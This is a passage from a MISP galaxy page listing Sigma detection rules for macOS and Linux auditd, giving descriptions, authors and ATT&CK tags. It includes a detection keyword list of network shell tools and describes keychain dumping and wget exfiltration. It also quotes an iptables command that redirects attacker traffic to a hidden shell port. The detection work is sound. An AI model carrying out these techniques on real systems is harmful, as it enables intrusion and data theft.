UUID f459ccb4-9805-41ea-b5b2-55e279e2424a which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On MacOS Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Qi Nan
creation_date 2024/03/11
falsepositive ['Legitimate usage of TeamViewer']
filename proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

System Shutdown/Reboot - MacOs

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

Internal MISP references

UUID 40b1fbe2-18ea-4ee7-be47-0294285811de which can be used as unique global reference for System Shutdown/Reboot - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate administrative activity']
filename proc_creation_macos_system_shutdown_reboot.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.impact', 'attack.t1529']
Related clusters

To see the related clusters, click here.

Disable Security Tools

Detects disabling security tools

Internal MISP references

UUID ff39f1a6-84ac-476f-a1af-37fcdf53d7c0 which can be used as unique global reference for Disable Security Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_disable_security_tools.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Credentials from Password Stores - Keychain

Detects passwords dumps from Keychain

Internal MISP references

UUID b120b587-a4c2-4b94-875d-99c9807d6955 which can be used as unique global reference for Credentials from Password Stores - Keychain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
creation_date 2020/10/19
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_creds_from_keychain.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1555.001']
Related clusters

To see the related clusters, click here.

JAMF MDM Execution

Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.

Internal MISP references

UUID be2e3a5c-9cc7-4d02-842a-68e9cb26ec49 which can be used as unique global reference for JAMF MDM Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jay Pandit
creation_date 2023/08/22
falsepositive ['Legitimate use of the JAMF CLI tool by IT support and administrators']
filename proc_creation_macos_jamf_usage.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.execution']

Network Sniffing - MacOs

Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Internal MISP references

UUID adc9bcc4-c39c-4f6b-a711-1884017bf043 which can be used as unique global reference for Network Sniffing - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/14
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_network_sniffing.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Default Credentials Usage

Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.

Internal MISP references

UUID 1a395cbc-a84a-463a-9086-ed8a70e573c7 which can be used as unique global reference for Default Credentials Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/26
falsepositive ['Unknown']
filename default_credentials_usage.yml
level medium
logsource.category No established category
logsource.product qualys
tags ['attack.initial_access']

Host Without Firewall

Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.

Internal MISP references

UUID 6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9 which can be used as unique global reference for Host Without Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/19
falsepositive No established falsepositives
filename host_without_firewall.yml
level low
logsource.category No established category
logsource.product qualys
tags No established tags

Cleartext Protocol Usage Via Netflow

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.

Internal MISP references

UUID 7e4bfe58-4a47-4709-828d-d86c78b7cc1f which can be used as unique global reference for Cleartext Protocol Usage Via Netflow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/26
falsepositive ['Unknown']
filename netflow_cleartext_protocols.yml
level low
logsource.category No established category
logsource.product No established product
tags ['attack.credential_access']

OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.

Internal MISP references

UUID 045b5f9c-49f7-4419-a236-9854fb3c827a which can be used as unique global reference for OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/09/17
falsepositive ['Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.']
filename lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.t1068', 'attack.t1190', 'attack.t1203']
Related clusters

To see the related clusters, click here.

Use Of Hidden Paths Or Files

Detects calls to hidden files or files located in hidden directories in NIX systems.

Internal MISP references

UUID 9e1bef8d-0fff-46f6-8465-9aa54e128c1e which can be used as unique global reference for Use Of Hidden Paths Or Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Burkett, @signalblur
creation_date 2022/12/30
falsepositive ['Unknown']
filename lnx_auditd_hidden_binary_execution.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

File or Folder Permissions Change

Detects file and folder permission changes.

Internal MISP references

UUID 74c01ace-0152-4094-8ae2-6fd776dd43e5 which can be used as unique global reference for File or Folder Permissions Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/09/23
falsepositive ['User interacting with files permissions (normal/daily behaviour).']
filename lnx_auditd_file_or_folder_permissions.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']
Related clusters

To see the related clusters, click here.

Logging Configuration Changes on Linux Host

Detect changes of syslog daemons configuration files

Internal MISP references

UUID c830f15d-6f6e-430f-8074-6f73d6807841 which can be used as unique global reference for Logging Configuration Changes on Linux Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_logging_config_change.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.006']
Related clusters

To see the related clusters, click here.

Systemd Service Creation

Detects a creation of systemd services which could be used by adversaries to execute malicious code.

Internal MISP references

UUID 1bac86ba-41aa-4f62-9d6b-405eac99b485 which can be used as unique global reference for Systemd Service Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/02/03
falsepositive ['Admin work like legit service installs.']
filename lnx_auditd_systemd_service_creation.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1543.002']
Related clusters

To see the related clusters, click here.

BPFDoor Abnormal Process ID or Lock File Accessed

detects BPFDoor .lock and .pid files access in temporary file storage facility

Internal MISP references

UUID 808146b2-9332-4d78-9416-d7e47012d83d which can be used as unique global reference for BPFDoor Abnormal Process ID or Lock File Accessed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Rafal Piasecki
creation_date 2022/08/10
falsepositive ['Unlikely']
filename lnx_auditd_bpfdoor_file_accessed.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1106', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Audio Capture

Detects attempts to record audio with arecord utility

Internal MISP references

UUID a7af2487-9c2f-42e4-9bb9-ff961f0561d5 which can be used as unique global reference for Audio Capture in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/04
falsepositive ['Unknown']
filename lnx_auditd_audio_capture.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Credentials In Files - Linux

Detecting attempts to extract passwords with grep

Internal MISP references

UUID df3fcaea-2715-4214-99c5-0056ea59eb35 which can be used as unique global reference for Credentials In Files - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename lnx_auditd_find_cred_in_files.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Binary Padding - Linux

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

Internal MISP references

UUID c52a914f-3d8b-4b2a-bb75-b3991e75f8ba which can be used as unique global reference for Binary Padding - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename lnx_auditd_binary_padding.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.001']
Related clusters

To see the related clusters, click here.

Steganography Hide Files with Steghide

Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.

Internal MISP references

UUID ce446a9e-30b9-4483-8e38-d2c9ad0a2280 which can be used as unique global reference for Steganography Hide Files with Steghide in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/11
falsepositive ['Unknown']
filename lnx_auditd_steghide_embed_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']
Related clusters

To see the related clusters, click here.

System Owner or User Discovery

Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Internal MISP references

UUID 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 which can be used as unique global reference for System Owner or User Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Admin activity']
filename lnx_auditd_user_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Suspicious C2 Activities

Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)

Internal MISP references

UUID f7158a64-6204-4d6d-868a-6e6378b467e0 which can be used as unique global reference for Suspicious C2 Activities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Marie Euler
creation_date 2020/05/18
falsepositive ['Admin or User activity']
filename lnx_auditd_susp_c2_commands.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.command_and_control']

Clipboard Collection with Xclip Tool - Auditd

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

Internal MISP references

UUID 214e7e6c-f21b-47ff-bb6f-551b2d143fcf which can be used as unique global reference for Clipboard Collection with Xclip Tool - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/24
falsepositive ['Legitimate usage of xclip tools']
filename lnx_auditd_clipboard_collection.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Steganography Extract Files with Steghide

Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.

Internal MISP references

UUID a5a827d9-1bbe-4952-9293-c59d897eb41b which can be used as unique global reference for Steganography Extract Files with Steghide in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/11
falsepositive ['Unknown']
filename lnx_auditd_steghide_extract_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']
Related clusters

To see the related clusters, click here.

Loading of Kernel Module via Insmod

Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.

Internal MISP references

UUID 106d7cbd-80ff-4985-b682-a7043e5acb72 which can be used as unique global reference for Loading of Kernel Module via Insmod in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/11/02
falsepositive ['Unknown']
filename lnx_auditd_load_module_insmod.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1547.006']
Related clusters

To see the related clusters, click here.

Webshell Remote Command Execution

Detects possible command execution by web application/web shell

Internal MISP references

UUID c0d3734d-330f-4a03-aae2-65dacc6a8222 which can be used as unique global reference for Webshell Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, Beyu Denis, oscd.community
creation_date 2019/10/12
falsepositive ['Admin activity', 'Crazy web applications']
filename lnx_auditd_web_rce.yml
level critical
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Unix Shell Configuration Modification

Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.

Internal MISP references

UUID a94cdd87-6c54-4678-a6cc-2814ffe5a13d which can be used as unique global reference for Unix Shell Configuration Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Peter Matkovski, IAI
creation_date 2023/03/06
falsepositive ['Admin or User activity are expected to generate some false positives']
filename lnx_auditd_unix_shell_configuration_modification.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1546.004']
Related clusters

To see the related clusters, click here.

Screen Capture with Import Tool

Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed.

Internal MISP references

UUID dbe4b9c5-c254-4258-9688-d6af0b7967fd which can be used as unique global reference for Screen Capture with Import Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/21
falsepositive ['Legitimate use of screenshot utility']
filename lnx_auditd_screencapture_import.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

Disable System Firewall

Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.

Internal MISP references

UUID 53059bc0-1472-438b-956a-7508a94a91f0 which can be used as unique global reference for Disable System Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/01/22
falsepositive ['Admin activity']
filename lnx_auditd_disable_system_firewall.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.t1562.004', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Steganography Unzip Hidden Information From Picture File

Detects extracting of zip file from image file

Internal MISP references

UUID edd595d7-7895-4fa7-acb3-85a18a8772ca which can be used as unique global reference for Steganography Unzip Hidden Information From Picture File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/09
falsepositive ['Unknown']
filename lnx_auditd_unzip_hidden_zip_files_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']
Related clusters

To see the related clusters, click here.

Linux Capabilities Discovery

Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.

Internal MISP references

UUID fe10751f-1995-40a5-aaa2-c97ccb4123fe which can be used as unique global reference for Linux Capabilities Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/11/28
falsepositive ['Unknown']
filename lnx_auditd_capabilities_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.privilege_escalation', 'attack.t1123', 'attack.t1548']
Related clusters

To see the related clusters, click here.

System and Hardware Information Discovery

Detects system information discovery commands

Internal MISP references

UUID 1f358e2e-cb63-43c3-b575-dfb072a6814f which can be used as unique global reference for System and Hardware Information Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename lnx_auditd_system_info_discovery2.yml
level informational
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Modify System Firewall

Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.

Internal MISP references

UUID 323ff3f5-0013-4847-bbd4-250b5edb62cc which can be used as unique global reference for Modify System Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author IAI
creation_date 2023/03/06
falsepositive ['Legitimate admin activity']
filename lnx_auditd_modify_system_firewall.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.t1562.004', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Auditing Configuration Changes on Linux Host

Detect changes in auditd configuration files

Internal MISP references

UUID 977ef627-4539-4875-adf4-ed8f780c4922 which can be used as unique global reference for Auditing Configuration Changes on Linux Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_auditing_config_change.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.006']
Related clusters

To see the related clusters, click here.

Modification of ld.so.preload

Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.

Internal MISP references

UUID 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 which can be used as unique global reference for Modification of ld.so.preload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename lnx_auditd_ld_so_preload_mod.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1574.006']
Related clusters

To see the related clusters, click here.

Masquerading as Linux Crond Process

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

Internal MISP references

UUID 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 which can be used as unique global reference for Masquerading as Linux Crond Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive No established falsepositives
filename lnx_auditd_masquerading_crond.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Steganography Hide Zip Information in Picture File

Detects appending of zip file to image

Internal MISP references

UUID 45810b50-7edc-42ca-813b-bdac02fb946b which can be used as unique global reference for Steganography Hide Zip Information in Picture File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/09
falsepositive ['Unknown']
filename lnx_auditd_hidden_zip_files_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']
Related clusters

To see the related clusters, click here.

Suspicious History File Operations - Linux

Detects commandline operations on shell history files

Internal MISP references

UUID eae8ce9f-bde9-47a6-8e79-f20d18419910 which can be used as unique global reference for Suspicious History File Operations - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2020/10/17
falsepositive ['Legitimate administrative activity', 'Legitimate software, cleaning hist file']
filename lnx_auditd_susp_histfile_operations.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1552.003']
Related clusters

To see the related clusters, click here.

File Time Attribute Change - Linux

Detect file time attribute change to hide new or changes to existing files.

Internal MISP references

UUID b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b which can be used as unique global reference for File Time Attribute Change - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename lnx_auditd_change_file_time_attr.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.006']
Related clusters

To see the related clusters, click here.

Possible Coin Miner CPU Priority Param

Detects command line parameter very often used with coin miners

Internal MISP references

UUID 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed which can be used as unique global reference for Possible Coin Miner CPU Priority Param in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/09
falsepositive ['Other tools that use a --cpu-priority flag']
filename lnx_auditd_coinminer.yml
level critical
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Network Sniffing - Linux

Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Internal MISP references

UUID f4d3748a-65d1-4806-bd23-e25728081d01 which can be used as unique global reference for Network Sniffing - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate administrator or user uses network sniffing tool for legitimate reasons.']
filename lnx_auditd_network_sniffing.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.discovery', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Data Exfiltration with Wget

Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.

Internal MISP references

UUID cb39d16b-b3b6-4a7a-8222-1cf24b686ffc which can be used as unique global reference for Data Exfiltration with Wget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/11/18
falsepositive ['Legitimate usage of wget utility to post a file']
filename lnx_auditd_data_exfil_wget.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Systemd Service Reload or Start

Detects a reload or a start of a service.

Internal MISP references

UUID 2625cc59-0634-40d0-821e-cb67382a3dd7 which can be used as unique global reference for Systemd Service Reload or Start in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/09/23
falsepositive ['Installation of legitimate service.', 'Legitimate reconfiguration of service.']
filename lnx_auditd_pers_systemd_reload.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1543.002']
Related clusters

To see the related clusters, click here.

Split A File Into Pieces - Linux

Detection use of the command "split" to split files into parts and possible transfer.

Internal MISP references

UUID 2dad0cba-c62a-4a4f-949f-5f6ecd619769 which can be used as unique global reference for Split A File Into Pieces - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_split_file_into_pieces.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.exfiltration', 'attack.t1030']
Related clusters

To see the related clusters, click here.

Clipboard Collection of Image Data with Xclip Tool

Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

Internal MISP references

UUID f200dc3f-b219-425d-a17e-c38467364816 which can be used as unique global reference for Clipboard Collection of Image Data with Xclip Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/10/01
falsepositive ['Legitimate usage of xclip tools']
filename lnx_auditd_clipboard_image_collection.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Bpfdoor TCP Ports Redirect

All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.

Internal MISP references

UUID 70b4156e-50fc-4523-aa50-c9dddf1993fc which can be used as unique global reference for Bpfdoor TCP Ports Redirect in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Rafal Piasecki
creation_date 2022/08/10
falsepositive ['Legitimate ports redirect']
filename lnx_auditd_bpfdoor_port_redirect.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Program Executions in Suspicious Folders

Detects program executions in suspicious non-program folders related to malware or hacking activity

Internal MISP references

UUID a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc which can be used as unique global reference for Program Executions in Suspicious Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/01/23
falsepositive ['Admin activity (especially in /tmp folders)', 'Crazy web applications']
filename lnx_auditd_susp_exe_folders.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.t1587', 'attack.t1584', 'attack.resource_development']
Related clusters

To see the related clusters, click here.

Remove Immutable File Attribute - Auditd

Detects removing immutable file attribute.

Internal MISP references

UUID a5b977d6-8a81-4475-91b9-49dbfcd941f7 which can be used as unique global reference for Remove Immutable File Attribute - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/09/23
falsepositive ['Administrator interacting with immutable files (e.g. for instance backups).']
filename lnx_auditd_chattr_immutable_removal.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']
Related clusters

To see the related clusters, click here.

Data Compressed

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID a3b5e3e9-1b49-4119-8b8e-0344a01f21ee which can be used as unique global reference for Data Compressed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate use of archiving tools by legitimate user.']
filename lnx_auditd_data_compressed.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.exfiltration', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Linux Network Service Scanning - Auditd

Detects enumeration of local or remote network services.

Internal MISP references

UUID 3761e026-f259-44e6-8826-719ed8079408 which can be used as unique global reference for Linux Network Service Scanning - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/21
falsepositive ['Legitimate administration activities']
filename lnx_auditd_network_service_scanning.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Screen Capture with Xwd

Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations

Internal MISP references

UUID e2f17c5d-b02a-442b-9052-6eb89c9fec9c which can be used as unique global reference for Screen Capture with Xwd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/13
falsepositive ['Legitimate use of screenshot utility']
filename lnx_auditd_screencaputre_xwd.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

System Shutdown/Reboot - Linux

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

Internal MISP references

UUID 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f which can be used as unique global reference for System Shutdown/Reboot - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_system_shutdown_reboot.yml
level informational
logsource.category No established category
logsource.product linux
tags ['attack.impact', 'attack.t1529']
Related clusters

To see the related clusters, click here.

Password Policy Discovery

Detects password policy discovery commands

Internal MISP references

UUID ca94a6db-8106-4737-9ed2-3e3bb826af0a which can be used as unique global reference for Password Policy Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
